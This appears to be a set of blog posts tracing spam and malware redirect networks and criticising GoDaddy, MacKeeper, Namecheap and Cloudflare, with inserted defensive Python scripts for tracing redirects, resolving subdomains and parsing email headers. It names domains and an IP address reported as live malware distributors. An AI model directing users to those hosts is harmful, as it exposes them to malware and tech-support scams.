Mapping a network of malware sites, and a distressing discovery

Right now, Eve and I are in the remote cabin in the woods where we wrote More Than Two, working on two new books: a nonfiction book called Love More, Be Awesome and a novel called Black Iron.

The cabin has very limited Internet access that’s approximately the same speed as old-fashioned dialup, so fetching email is always a bit dicey. Imagine my disappointment at the timing, then, of a large-scale malware attack.

The emails are all very simple: just two lines and a bit.ly URL shortener address. They come from a wide range of IP addresses with a large number of different forged From: addresses, and they all look exactly the same:

The system behind this email, however, is anything but simple.


The Network

The emails all contain a short URL from the popular bit.ly URL shortener service. There’s a complex network behind that short URL that does several different things: it promotes dodgy products such as supposed “brain boosting” pills, attempts to download malware, and tries to trick people into phoning phony tech support Web sites that scam victims for hundreds of dollars in fake tech support charges (and also dupe victims into downloading more malware).

*** WARNING *** WARNING *** WARNING ***

All the sites mentioned in this post are live at the time of writing this. Most of them will attempt to download malware or redirect you to sites that attempt to download malware. Do not visit these sites if you don’t know what you’re doing.

When you click the link in one of these emails, you’re redirected via several steps to a site called wholesoil.com that then sends you off to one of many, many possible destinations, some of which are typical run-of-the-mill spam sites and some of which are malware sites. The network looks like this:

This chart is not complete; there are many, many other malware sites that you may be redirected to. I charted well over a dozen more such sites before I quit looking.

Clicking on the link contained in the email enters you into a lottery of suck: Will you get spam? Will you get pwn3d? Hard to say!

I’m not 100% certain it’s entirely random. There may be some element of looking at the browser’s user agent or the visitor’s IP address; visiting wholesoil.com repeatedly in a short span of time will tend to result in getting redirected to the same spam URL over and over after a while.

The people behind this network have gone to considerable lengths to hide themselves. For example, one step of the redirection happens via a domain parking service called tracted.net. The redirection script that relays traffic through this site scrubs the referrer header. When you travel from one Web site to another, your browser sends a “referrer header” (the HTTP Referer header) that tells the new site where you came from; this is how site owners can tell where their traffic is coming from. But this network carefully removes that information, so that the owners of tracted.net cannot easily detect this traffic.

The most common spam destination is a subdomain on a site called fastgoodforms.com. These subdomains change often: 570-inteligen.fastgoodforms.com, 324-brain.fastgoodforms.com, 923-inteligen.fastgoodforms.com, and so on.
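The redirection chain described above (short URL, parking service, wholesoil.com, final destination) can be recorded hop by hop without rendering any of the pages. The following tracer is an added example written for this post; it is not the author’s tooling. It fetches only status lines and headers, so meta-refresh and JavaScript redirects show up as the end of the HTTP-level chain for manual inspection, and it lets you trace with different User-Agent strings to see whether the chain routes clients differently, as the post suspects. The hostnames in the usage section are constructed placeholders, not the sites named in the post.

```python
"""Hop-by-hop tracer for HTTP redirect chains (added example, not the post's code)."""
import urllib.error
import urllib.request
from urllib.parse import urljoin


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Tell urllib not to follow redirects, so every hop can be recorded."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_status_location(url, user_agent):
    """Default fetcher: (status, Location header or None) for one request.

    Only headers are read; the response body is never executed or rendered."""
    req = urllib.request.Request(url, headers={"User-Agent": user_agent})
    opener = urllib.request.build_opener(_NoRedirect)
    try:
        with opener.open(req, timeout=10) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:
        # With redirects disabled, 3xx responses surface as HTTPError; the
        # Location header is still available on the error object.
        return err.code, err.headers.get("Location")


def trace_chain(start_url, fetch=fetch_status_location,
                user_agent="Mozilla/5.0", max_hops=15):
    """Follow Location headers from start_url and record every hop.

    Returns (chain, reason): chain is a list of (url, status) tuples in the
    order visited; reason is 'final' (a non-redirect response was reached),
    'loop' (a URL repeated) or 'max_hops' (the hop cap was hit).
    """
    chain, seen, url = [], set(), start_url
    for _ in range(max_hops):
        if url in seen:
            return chain, "loop"
        seen.add(url)
        status, location = fetch(url, user_agent)
        chain.append((url, status))
        if 300 <= status < 400 and location:
            url = urljoin(url, location)  # Location may be relative
        else:
            return chain, "final"
    return chain, "max_hops"


def final_destinations(start_url, user_agents, fetch=fetch_status_location):
    """Trace once per User-Agent and map each agent to where it ended up.

    Different endings for different agents are the per-client routing the
    post suspects (user agent or source IP steering the chain)."""
    return {ua: trace_chain(start_url, fetch, ua)[0][-1][0]
            for ua in user_agents}


if __name__ == "__main__":
    # Placeholder URL; substitute a link from a captured message on an analysis box.
    chain, reason = trace_chain("http://short-link.example/abc123")
    for hop_url, status in chain:
        print(status, hop_url)
    print("stopped:", reason)
```

The `fetch` parameter exists so the chain logic can be exercised against recorded responses; the default fetcher talks to the network. Note that a chain ending with a 200 at a parking or hub site usually means the next step is a JavaScript or meta-refresh redirect, which is where the referrer scrubbing the post describes typically happens.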

But more often than spam, users will get redirected to a phony tech support page that displays a fake Windows error message. These sites look like this:

These sites attempt to download malware—specifically, a remote control program that allows attackers to take control of an infected computer. They also attempt to prevent the user’s Web browser from leaving the site, and display popups over and over and over again telling the user that the computer has been infected by a virus and to call Microsoft Support at a toll-free number.

The toll-free number is owned and operated by the scammers. If you call it, you’re sent to a person in India who will attempt to get your credit card number, and will try to talk you into installing software on your computer to “fix” the “problem.” This software is, of course, remote control malware.


How the mighty fall

While I was tracing out this network, I discovered many, many, many of these fake tech support Web sites that are being used to spread malware and try to con users.

And that’s where I noticed an interesting pattern.

The overwhelming majority of these malware sites are hosted, not on dodgy services in China or the Netherlands as you might normally expect, but on GoDaddy.

Not all of the malware sites are hosted on GoDaddy (I found one hosted on One, one hosted on Hostwinds, and one on IX Web Hosting, for example), but the vast majority—literally dozens—are.

I believe that GoDaddy is the choice of malware hosts because their abuse and security teams, which once upon a time had an excellent reputation in the Web hosting industry, have been pared back to the point they can no longer keep up…or perhaps simply no longer care. (GoDaddy was bought out by an investment group a few years back, which is when its reputation began to decline.)

I reported the Hostwinds-hosted malware site to Hostwinds abuse; it was removed about ten hours later. I reported the malware site on IX Web Hosting; it was gone in 17 minutes. But malware and phish sites on GoDaddy remain, in my experience, for an average of about a month before GoDaddy acts, and spam sites remain essentially forever.

Spammers and malware distributors are adaptable. They move Web hosts often, leaving hosting companies that take rapid action against them and congregating on tolerant sites that permit spam and malware. I suspect the fact that so many malware and fake tech support sites are hosted on GoDaddy is a consequence of the indifference or inability of their abuse and security teams.

To be fair, if you make enough noise, GoDaddy will eventually act. I have engaged with GoDaddy on Twitter, and when I do that, they will generally take down a site I complain about within a few days. The dozens of other sites, however, remain.


I am currently a GoDaddy customer. I do not use GoDaddy for Web hosting, but I do have a large number of domains registered there. I intend to begin removing my domains from GoDaddy, because I do not like supporting spam-tolerant companies. (Ironically, this was the reason I left Namecheap to go to GoDaddy; Namecheap is owned by a company called Rightside, which has become notorious for willingly hosting some of the biggest players in the spam business.)

So if you have a domain registrar you use, please leave a comment! I would love to find a replacement for GoDaddy and pull all my domains away from them. (If you’re using GoDaddy for Web hosting or domains, I advise you to do likewise, unless you fancy staying with a company whose approach to security and malware is so lax.)

I would also like to invite GoDaddy representatives to offer their side of the story in the comments as well.

MacKeeper: The Gift that Keeps On Giving

Stop me if you’ve heard this one before:

A shady, disreputable company makes a dodgy bit of software they claim will protect a computer from malware, but that actually does nothing (at best) or harms your computer (at worst). They sell this software by creating fake Web sites that throw up phony “virus warnings” to visitors pushing the dodgy software, then use a number of devious and underhanded tricks to steer traffic to the fake antivirus pages. They get caught, they find themselves on the receiving end of a class-action lawsuit, and they sell the software to a new company, which promises to clean up its act but which ends up doing exactly the same thing.

If you’re a Mac user, you probably recognize this story. It’s the story of MacKeeper, a bogus bit of software that bills itself as a security and general cleanup app.

MacKeeper is a bit of software with a long and ignoble history. It was originally written by a company called Zeobit, which was so aggressive in marketing the software by shady means that it got hammered with a $2 million settlement in a class action lawsuit. Business Insider magazine has recommended that users stay away from it.

In 2013, a company called Kromtech bought MacKeeper from Zeobit. Kromtech claims to be a German company, but it’s incorporated in the Virgin Islands and all its owners are in the Ukraine. And Kromtech is continuing the practice of pushing the software with phony antivirus sites and fake claims.

The scam works like this:

Booby-trapped ads on legitimate Web sites and redirectors placed on hacked Web sites steer users to fake antivirus pages. These antivirus pages, which live at URLs that look like official Apple URLs, pop up phony warnings of non-existent viruses.

These Web sites attempt to prevent you from leaving, and pop up alert box after alert box warning of a completely phony virus.

When you click on the button to do a “virus scan,” you are shown–surprise!–a report that says your system is infected.

The supposed “tapsnake virus” that this warning talks about is bogus. Tapsnake does not exist; it is a scareware scam used to frighten naive computer and smartphone users into thinking they are infected with a virus.

And, naturally, when you click the “Remove Virus Now” button, you’re taken to…wait for it…

Meet the new MacKeeper owners, same as the old MacKeeper owners.

I’ve seen a considerable uptick in phony antivirus sites trying to con people into buying MacKeeper lately, particularly in the last six weeks.

There is no Tapsnake virus, and your Mac is not infected. It’s a con, designed to sell you a worthless piece of software.

Stay safe out there in cyberspace.

WordPress security issues: this is a bad one, folks

It’s been a bad week for WordPress. If you’re a WordPress user, I highly recommend you check as soon as possible to ensure your site is updated, all your plugins are up to date, and your site is free of unexpected users and malicious code.

WordPress 4.4.2 was released February 2. This release fixes two known security flaws.

Hot on the heels of this security release come two worrying developments. The first, reported on over at the Wordfence blog, concerns a new WordPress attack platform that makes it easier than ever for criminals to attack WordPress sites. From the article:

The attack platform once fully installed provides an attacker with 43 attack tools they can then download, also from pastebin, with a single click. The functionality these tools provide includes:

  • Complete attack shells that let attackers manage the filesystem, access the database through a well designed SQL client, view system information, mass infect the system, DoS other systems, find and infect all CMS’s, view and manage user accounts both on CMS’s and the local operating system and much more.
  • An FTP brute force attack tool
  • A Facebook brute force attacker
  • A WordPress brute force attack script
  • Tools to scan for config files or sensitive information
  • Tools to download the entire site or parts thereof
  • The ability to scan for other attackers’ shells
  • Tools targeting specific CMS’s that let you change their configuration to host your own malicious code

The post includes a video of the attack platform in action.

Second, from Ars Technica, is a report of WordPress sites being hacked and made to download ransomware to visitors’ computers.

It’s not currently clear how the sites are being compromised, but it may be via an unknown zero-day security exploit. From the article:

According to a Monday blog post published by website security firm Sucuri, the compromised WordPress sites he observed have been hacked to include encrypted code at the end of all legitimate JavaScript files. The encrypted content is different from site to site…

It’s not yet clear how the WordPress sites are getting infected in the first place. It’s possible that administrators are failing to lock down the login credentials that allow the site content to be changed. It’s also feasible that attackers are exploiting an unknown vulnerability in the CMS, one of the plugins it uses, or the operating system they run on. Once a system is infected, however, the website malware installs a variety of backdoors on the webserver, a feature that’s causing many hacked sites to be repeatedly reinfected.

What can you do to protect your WordPress site? If you’re running WordPress, I strongly, strongly urge you to do the following:

  • Use strong admin passwords! I cannot emphasize this enough. Use strong admin passwords! Criminals use automated tools to scan thousands of WordPress sites an hour looking for weak passwords. A normal WordPress install will be scanned dozens to hundreds of times a day. Use strong admin passwords!
  • Update all your sites RELIGIOUSLY. When a WordPress security patch is released, criminals will go to work examining the patch to see what it fixes, then develop automated tools to automatically hack unpatched sites. You may have only 24-48 hours between when a security patch comes out and when people start using tools that will automatically compromise sites that haven’t installed the patch. Turn on automatic updates. Keep on top of your site.
  • Install a tool like WordFence. This free plugin will protect your site by locking out people who use known attack tools or brute-force password guessing attempts. It will notify you by email of hack attempts and updates that need to be installed.
  • Install a tool like WPS Hide Login to move your login page to a hidden location, like /mysecretlogin instead of /wp-login.php. This will go miles toward securing your site.

I highly recommend you install the free Infinite WP tool as well. It’s a plugin plus a Web app that will notify you of updates and allow you to update one or many WordPress sites with just one button click. This is a great way to keep on top of security patches.

Also, absolutely do not assume you’re safe because you’re an obscure little blog that nobody cares about. The criminals will still find you. They use totally automated tools to scan for vulnerable WordPress sites looking for installations to exploit. It doesn’t matter if only you and your mom know about your site–criminals will find it and will exploit it.

Stay safe!

Namecheap: Why I’m moving away from them

I have a rather extensive collection of Web sites, where I write about everything from photography to transhumanism to sex. As a result, I have rather a lot of domain names, which until recently I’ve registered with Namecheap, as they have in the past been cheap and reasonably reliable.

However, I have begun the painful and expensive process of moving off Namecheap, and I recommend others do the same. There are two interrelated reasons for this, the first having to do with poor support and training (Namecheap employees don’t appear to know the difference between a domain and a subdomain, which is rather a serious problem when you’re in the business of domains) and the second having to do with support for spam and malware (largely on account of the first).

The story is long and complicated, but it begins many months ago with a spam email advertising life insurance, which was plugging a domain hosted on Namecheap Hosting.

Namecheap, in addition to being a domain registrar (well, technically a reseller for a registrar called Enom), is also a Web hosting company. If you’re a Web hosting company, sooner or later a spammer will host a Web site with you. How you react when you receive abuse reports will determine how popular you are with spammers. If you react quickly, spammers will avoid you. If you allow the site to remain up, spammers will talk, and soon other spammers will flock to you. If you continue to leave spam domains up, pretty soon spammers will start choking out your other customers.

Anyway, it happens. A spammer found Namecheap Hosting. I hadn’t seen much spam on Namecheap before, so I fired off an abuse report and that was the end of it.

Or so I thought. But then things took a turn for the strange.

A couple of days later, I received an email from Namecheap abuse saying “we aren’t hosting this domain, go complain to someone else.” Now, that happens from time to time as well; spammers will sometimes hop from one host to the next, so by the time a host receives a complaint, the spammer’s Web site has been moved and they’re not hosting it any more.

I looked at the domain. Still hosted on Namecheap. I wrote back saying “no, it’s definitely hosted by you guys; here’s the IP address, 162.255.119.254. That address is in your space.”

And got back a second email: “We’re not hosting this site.”

“Huh,” I thought, “that’s strange. Maybe the site is hosted on many IP addresses?” That’s another spam tactic, putting a Web site on a bunch of hosts and then changing the IP address constantly. But no, the site had only ever been hosted by Namecheap.

I replied and said “no, here’s the DNS entry, here’s the history for the site, you’re definitely hosting it.” And got back yet another reply: “no we’re not.”

And then something even weirder happened.

I started getting tons of spam advertising domains pointing to Namecheap’s IP address space. Tons. Spam advertising life insurance, promoting Bitcoin schemes, advertising phony “cures” for diabetes. Spam pitching window replacement services, Amazon gift cards, Russian dating sites, and home refinancing.

And I’d seen this spam before. It was word-for-word and image-for-image identical to spam from well-known, infamous spam purveyors that had always, until now, advertised sites hosted in Russia, Colombia, and the Ukraine–places that tend to permit spam hosting.

I started getting multiple pieces of this spam a day. Then dozens. All of it advertising domains on Namecheap IP addresses.

  
Left: Old spam advertising a site hosted in Eastern Europe. Right: Recent spam advertising a site on Namecheap.

I sent spam reports to Namecheap…and Namecheap’s abuse team kept sending responses saying “we aren’t hosting these sites.”


This is the point where I learned that Namecheap, a company that sells domain names, does not understand how a domain name works.

A typical domain name has three (or more) parts. The parts are separated by periods. Let’s look at an example:

www.morethantwo.com

Going from right to left: The last part is called a “top level domain,” or “TLD”. It’s things like “.com” or “.net” or a country-specific code like “.ca” (for Canadian sites). The UK uses “.co.uk” for various historical reasons.

The part before the TLD, in this case morethantwo, is the domain name.

The part at the very beginning, in this case www, is a subdomain. The subdomain “www” stands for “World Wide Web” and it’s the most common subdomain by far. But you can make a subdomain be anything you want. You could set up your Web site at “polyamory.morethantwo.com” or “groupsexisawesome.morethantwo.com” or anything else you like.

And here’s the important part:

You can put a subdomain on a completely different server, hosted by a completely different Web host.

For example, morethantwo.com is hosted by Incubus Web hosting. But if I wanted to, I could put “polyamory.morethantwo.com” on Dreamhost and “groupsexisawesome.morethantwo.com” on Softlayer–each subdomain can get its own IP address and its own Web server, if you want.

Now you might not know that, and you can be excused for not knowing that. It’s not necessary to understand how the Internet works in order to use it.

But Namecheap should know that. They sell domain names. This is what they do.

It’s okay if a person who owns a car doesn’t know that a car’s engine has more than one spark plug in it, but no professional mechanic should ever be ignorant of that simple fact. It’s okay if a person who uses the Web, or even a person who owns a Web site, doesn’t know that a subdomain can be hosted on a different IP address from its main domain. It’s unforgivable that a domain registrar doesn’t know that.

In this case, the spammer is using domain names that look like

view1.gnrlbshomes.us

“view1” is a subdomain, hosted by Namecheap. The main domain, gnrlbshomes.us, is hosted elsewhere. Namecheap’s abuse team doesn’t know how that works. When they received the spam complaint, they didn’t look at view1.gnrlbshomes.us; they only looked at gnrlbshomes.us.
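The check the abuse team skipped is mechanical: resolve the exact hostname in the spamvertised URL and, separately, each of its parent names, then compare the addresses. The following is an added example (not Namecheap’s or anyone’s abuse tooling) that does that. The resolver is injectable so the logic can be exercised offline; the default uses the system resolver. The list of two-label public suffixes is a deliberately short sample for the example, and the `203.0.113.10` address used in the usage section for the main domain is constructed (the post gives only the subdomain’s address).

```python
"""Resolve a hostname and each of its parent domains separately.

Added example for this post; not the tooling of any registrar or host.
"""
import socket

# A few multi-label public suffixes so that e.g. example.co.uk is treated as
# one registrable domain. Simplification for the example; a real tool would
# load the full Public Suffix List.
SECOND_LEVEL_SUFFIXES = {"co.uk", "org.uk", "ac.uk", "com.au", "co.jp"}


def registrable_domain(hostname):
    """'morethantwo.com' for 'www.morethantwo.com',
    'example.co.uk' for 'www.example.co.uk'."""
    labels = hostname.lower().strip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in SECOND_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def ancestors(hostname):
    """Every name from the full host down to its registrable domain, e.g.
    ['view1.gnrlbshomes.us', 'gnrlbshomes.us']."""
    base = registrable_domain(hostname)
    labels = hostname.lower().strip(".").split(".")
    names = []
    for i in range(len(labels)):
        name = ".".join(labels[i:])
        names.append(name)
        if name == base:
            break
    return names


def resolve_ancestors(hostname, resolve=socket.gethostbyname):
    """Resolve each ancestor independently.

    Returns [(name, address_or_None, same_as_full_host), ...] so the reader
    sees at a glance whether the subdomain lives somewhere other than the
    main domain. The exact spamvertised name is always the first entry."""
    report = []
    for name in ancestors(hostname):
        try:
            addr = resolve(name)
        except OSError:  # socket.gaierror is an OSError: name does not resolve
            addr = None
        report.append((name, addr))
    full_addr = report[0][1]
    return [(n, a, a is not None and a == full_addr) for n, a in report]


def hosted_separately(hostname, resolve=socket.gethostbyname):
    """True when the exact hostname resolves somewhere other than its
    registrable domain: the case an abuse desk must not overlook."""
    report = resolve_ancestors(hostname, resolve)
    return report[0][1] is not None and report[0][1] != report[-1][1]


if __name__ == "__main__":
    # Constructed answers: the subdomain's address is the one from the post,
    # the main domain's address is a placeholder from a documentation range.
    constructed = {"view1.gnrlbshomes.us": "162.255.119.254",
                   "gnrlbshomes.us": "203.0.113.10"}
    for name, addr, same in resolve_ancestors("view1.gnrlbshomes.us",
                                              constructed.__getitem__):
        print(f"{name:24} {addr or '(no address)':16} "
              f"{'same host' if same else 'DIFFERENT host'}")
```

An abuse report should always quote the first line of that output, the exact hostname and its address, since that is the only name whose hosting is in question.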

When I figured out what was happening, a light dawned. I fired off a reply explaining that view1.gnrlbshomes.us and gnrlbshomes.us were hosted at different IP addresses, and they were hosting the actual spamvertised URL, view1.gnrlbshomes.us.

Problem solved, right? They simply missed the subdomain, right? Wrong.

Elena, it seems, didn’t talk to Kate. Namecheap has a systemic problem. This isn’t someone not noticing the subdomain, this is someone not knowing how domains work.

And I got a lot of these emails, from all different people: “The domain ‘blah blah blah’ isn’t hosted by Namecheap.”

At this point, I was convinced the problem was incompetence…and a bizarre incompetence, an incompetence on the level of a professional auto mechanic not understanding that an engine has more than one spark plug.

But then, things took a turn for the even weirder.

I patiently replied to each of the emails, showing the IP address of the main domain and the subdomain, and that the subdomain was in fact on Namecheap IP space.

And then I started getting replies like this:

Essentially, what this says is “if you don’t actually send email from a Namecheap server, you’re welcome to spam a domain that lives in Namecheap space and we’re A-OK with that.”

Now, spammers almost never send emails from the same servers their Web sites live on. Usually, spammers send emails from home computers that are infected with viruses without their owners’ consent (a lot of computer viruses are written for profit; the virus authors infect computers with software that allows them to remotely control the computers, then sell lists of infected computers to spammers, who use the infected computers to send spam email). Sometimes, the spam emails are sent from “bulletproof” spam mail servers in places like the Ukraine. But they almost never come from the same computer that’s hosting a site.

So Web hosting companies want to see a spam email with full headers when you report spam, so they can verify that, yep, this is a spam email, and shut down the Web site that’s being spamvertised.

But not Namecheap. Namecheap will knowingly and willingly allow you to spam domains on their servers, provided the spam email doesn’t actually come from the same server.
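The two facts a hosting abuse desk should put side by side are the machine that injected the message and the host that serves the advertised site. The script below is an added example (not the author’s tooling) that pulls both out of a raw email: it walks the Received headers from the earliest hop upward, skipping RFC 1918, loopback and link-local addresses to find the injecting host, and separately lists the hostnames from URLs in the body. The message in `SAMPLE_EMAIL` is constructed; its addresses are documentation ranges and the sending host is deliberately unrelated to the web host, which is the situation the post describes.

```python
"""Originating IP and spamvertised hostnames from a raw spam email.

Added example for this post; not the tooling of any host or reporter.
"""
import email
import ipaddress
import re
from email.policy import default

# Constructed message: injected by a broadband host, relayed twice, advertising
# a subdomain. Received headers are prepended by each MTA, so the bottom one
# is the first hop.
SAMPLE_EMAIL = """\
Received: from mx.example.org (mx.example.org [192.0.2.25])
\tby inbox.example.org with ESMTP id abc123; Thu, 4 Feb 2016 09:12:01 +0000
Received: from localhost (localhost [127.0.0.1])
\tby mx.example.org with ESMTP; Thu, 4 Feb 2016 09:12:00 +0000
Received: from dsl-pool-host.example.net (unknown [198.51.100.23])
\tby mx.example.org with SMTP; Thu, 4 Feb 2016 09:11:58 +0000
From: "Life Insurance" <offers@gnrlbshomes.us>
To: victim@example.org
Subject: Your quote is ready
Content-Type: text/plain

Compare rates now: http://view1.gnrlbshomes.us/quote?id=77
Unsubscribe: http://view1.gnrlbshomes.us/out
"""

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)

# Checked against an explicit list rather than ip_address.is_private, which
# would also treat the documentation ranges used in the sample as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",   # RFC 1918
    "127.0.0.0/8", "169.254.0.0/16",                   # loopback, link-local
)]


def is_internal(ip):
    """True for addresses that cannot be the external injecting host."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def received_hops(msg):
    """IPs from Received headers, earliest hop first."""
    hops = []
    for header in reversed(msg.get_all("Received", [])):
        hops.extend(IP_RE.findall(header))
    return hops


def origin_ip(msg):
    """First non-internal IP in the delivery path: the machine that injected
    the message (typically an infected PC, not the web host)."""
    for ip in received_hops(msg):
        if not is_internal(ip):
            return ip
    return None


def spamvertised_hosts(msg):
    """Distinct hostnames from URLs in the body, in order of appearance."""
    body = msg.get_body(preferencelist=("plain", "html")).get_content()
    seen = []
    for host in URL_HOST_RE.findall(body):
        host = host.lower()
        if host not in seen:
            seen.append(host)
    return seen


def summarize(raw):
    """The two things to compare in an abuse report, as a dict."""
    msg = email.message_from_string(raw, policy=default)
    return {"origin_ip": origin_ip(msg),
            "spamvertised_hosts": spamvertised_hosts(msg)}


if __name__ == "__main__":
    print(summarize(SAMPLE_EMAIL))
```

The sending address belongs to whoever runs the mail relay or the infected machine, and is the right target for a complaint about the sending. The spamvertised hostnames are what a web host is being asked about, and they are judged by where they resolve, not by whether the host’s own mail servers sent anything.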

When I asked if their policy was to permit spam that doesn’t originate from the same server as the Web site, I received this reply:

Which to me looks like a “yes.”

At the moment, I am receiving 11 spam emails a day advertising domains that resolve to Namecheap IP addresses. There are about half a dozen products being spamvertised; each day’s crop of spam messages is word for word and image for image identical to the previous day’s, but the domains are different. Clearly, the spammers feel they’ve found a good home in Namecheap.

So I took a look at that IP address, 162.255.119.254. It’s quite a mess.

Domains on 162.255.119.254 are all forwarded; that is, 162.255.119.254 is a pass-along to other IP addresses. If you want to put up a Web site and you don’t want anyone to know who’s really hosting it, you can put it there, and visitors will be invisibly passed along to its real home.

Now, can you guess what sort of thing that’s useful for?

If you said “spam and malware!” you’re absolutely right. A Virustotal analysis of 162.255.119.254 shows that it’s being used to spread a lot of bad stuff:

And it’s not just Virustotal. A Google search for 162.255.119.254 shows that it has a reputation as a bad neighborhood in a lot of places. It’s listed as a bad actor in the Cyberwarzone list:

and as a virus distributor in the Herdprotect list:

At this point, I got tired of making screenshots, but basically this Namecheap server has a bad reputation everywhere.

So whether through gross incompetence or active malice, Namecheap is running a server that’s a haven for spammers and malware distribution.

Which is why I’ve begun pulling my domain name registrations from them. I cannot in good conscience spend money to support a company that’s such a menace to the Internet, and I spend about $500 a year in registrations.

Now, interestingly, I’m averaging about 11 spam emails a day advertising domains on Namecheap’s IP space, but I’m averaging 20 spam emails a day that are word for word identical to these but aren’t advertising a domain on Namecheap.

The ones that are advertising domains not on Namecheap are advertising domains hosted by a company called Rightside.co, a Web host I’m not familiar with.

As I mentioned before, Namecheap is a reseller for a registrar called Enom. And Rightside.co, well…

The fact that the same spammer is using Namecheap and Rightside, and they’re both front-ends for Enom, is interesting. Stay tuned!

Cloudflare: The New Face of Bulletproof Spam Hosting

…or, why do I get all this spam, and who’s serving it?

Spammers have long had to face a problem. Legitimate Web hosting companies don’t host spam sites. Almost all Web hosts have policies against spam, so spammers have to figure out how to get their sites hosted. After all, if you can’t go to the spammer’s website to buy something, the spammer can’t make money, right?

In the past, spammers have used overseas Web hosting companies, in countries like China or Romania, that are willing to turn a blind eye to spam in exchange for money. A lot of spammers still do this, but it’s becoming less common, as even these countries have become increasingly reluctant to host spam sites.

For a while, many spammers were turning to hacked websites. Someone would set up a WordPress blog or a Joomla site but wouldn’t keep on top of security patches. The spammers would use automated tools capable of scanning hundreds of thousands of sites looking for vulnerabilities and hacking them automatically, then they’d place the spam pages on the hacked site. And a lot of spammers still do this.

But increasingly, spammers are turning to the new big thing in bulletproof spam serving: content delivery networks like Cloudflare.


What is a content delivery network?

Basically, a content delivery network is a bunch of servers that sit between a traditional Web server and you, the Web user.

A ‘normal’ Web server arrangement looks something like this:

When you browse the Web, you connect directly to a Web server over the Internet. The Web server takes the information stored on it and sends it to your computer.

With a content delivery network, it looks more like this:

The CDN, like Cloudflare, has a large number of servers, often spread all over the country (or the globe). These servers make a copy of the information on the Web server. When you visit a website served by a CDN, you do not connect to the Web server. You connect to one of the content delivery network servers, which sends you the copy of the information it made from the Web server.

There are several advantages to doing this:

1. The Web server can handle more traffic. With a conventional Web server, if too many people visit the Web site at the same time, the Web server can’t handle the traffic, and it goes down.

2. The site is protected from hacking and denial-of-service attacks. If someone tries to hack the site or knock it offline, at most they can affect one of the CDN servers. The others keep going.

3. It’s faster. If you are in Los Angeles and the Web server is in New York, the information has to travel many “hops” through the Internet to reach you. If you’re in Los Angeles and the content delivery network has a server in Los Angeles, you’ll connect to it. There are fewer hops for the information to pass through, so it’s delivered more quickly.


Cloudflare and spam

Spammers love Cloudflare for two reasons. First, when a Web server is behind Cloudflare’s network, it is in many ways hidden from view. You can’t tell who’s hosting it just by looking at its IP address, the way you can with a conventional Web server, because the IP address you see is for Cloudflare, not the host.

Second, Cloudflare is fine with spam. They’re happy to provide content delivery services for spam, malware, “phish” sites like phony bank or PayPal sites–basically, whatever you want.

Cloudflare’s Web page says, a little defensively, “CloudFlare is a pass-through network provider that automatically caches content for a limited period in order to improve network performance. CloudFlare is not a hosting provider and does not provide hosting services for any website. We do not have the capability to remove content from the web.” And, technically speaking, that’s true.

Cloudflare doesn’t own the Web server. They don’t control what’s on it and they can’t take it offline. So, from a literal, technical perspective, they’re right when they say they can’t remove content from the web.

They can, however, refuse to provide services for spammers. They can do that, but they don’t.
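The hiding effect described above has a practical consequence for anyone reporting abuse: if the address a spamvertised hostname resolves to belongs to a CDN, that address identifies the CDN, not the web host, and the report has to go to the CDN’s abuse desk (or be chased through it). The following added example (not Cloudflare’s or the author’s code) resolves a hostname and checks the address against a list of CDN edge prefixes. `CDN_PREFIXES` holds a short snapshot of IPv4 prefixes from Cloudflare’s published list at https://www.cloudflare.com/ips; refresh it from that page rather than trusting this copy. The resolver is injectable, and the hostnames in the test are constructed.

```python
"""Is this spamvertised host fronted by a CDN? (added example, not CDN tooling)"""
import ipaddress
import socket

# Snapshot of prefixes from Cloudflare's published IPv4 list; refresh from
# https://www.cloudflare.com/ips before relying on it.
CDN_PREFIXES = {
    "Cloudflare": [
        "103.21.244.0/22", "104.16.0.0/13", "108.162.192.0/18",
        "141.101.64.0/18", "162.158.0.0/15", "172.64.0.0/13",
        "173.245.48.0/20", "198.41.128.0/17",
    ],
}

_NETWORKS = {name: [ipaddress.ip_network(p) for p in prefixes]
             for name, prefixes in CDN_PREFIXES.items()}


def cdn_for(ip):
    """Name of the CDN whose edge prefixes contain ip, or None."""
    addr = ipaddress.ip_address(ip)
    for name, nets in _NETWORKS.items():
        if any(addr in net for net in nets):
            return name
    return None


def classify_host(hostname, resolve=socket.gethostbyname):
    """Resolve hostname and say what its address tells an abuse reporter.

    Returns a dict with the address, the CDN name (or None) and a short note
    on where a report about the site should be directed."""
    try:
        ip = resolve(hostname)
    except OSError:  # name does not resolve
        return {"host": hostname, "ip": None, "cdn": None,
                "report_to": "the registrar; the name does not resolve"}
    cdn = cdn_for(ip)
    if cdn:
        note = f"{cdn} abuse desk; the origin host is not visible from DNS"
    else:
        note = "the network owner of the address (whois/RDAP lookup on the IP)"
    return {"host": hostname, "ip": ip, "cdn": cdn, "report_to": note}


if __name__ == "__main__":
    # Constructed answers for a stand-alone run; the first address is inside
    # a Cloudflare prefix, the second is a documentation address.
    constructed = {"shop.example": "104.16.5.6", "direct.example": "198.51.100.40"}
    for host in constructed:
        print(classify_host(host, constructed.__getitem__))
```

Because a CDN caches whatever the origin serves, taking the origin down (as Hostwinds and IX Web Hosting did for the author within hours) is what ends the abuse; a CDN-fronted site whose origin cannot be identified from DNS is exactly the “bulletproof” arrangement the post is describing.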


History

CloudFlare was founded by Matthew Prince, Lee Holloway, and Michelle Zatlyn, three people who had previously worked on Project Honey Pot, which was–ironically–an anti-spam, anti-malware project.

Project Honey Pot allows website owners to track spam and hack attacks against their websites and block malicious traffic. In an interview with Forbes magazine, Michelle Zatlyn said:

“I didn’t know a lot about website security, but Matthew told me about Project Honey Pot and said that 80,000 websites had signed up around the world. And I thought ‘That’s a lot of people.’ They had no budget. You sign up and you get nothing. You just track the bad guys. You don’t get protection from them. And I just didn’t understand why so many people had signed up.”

It was then that Prince suggested creating a service to protect websites and stop spammers. “That’s something I could be proud of,” Zatlyn says. “And so that’s how it started.”

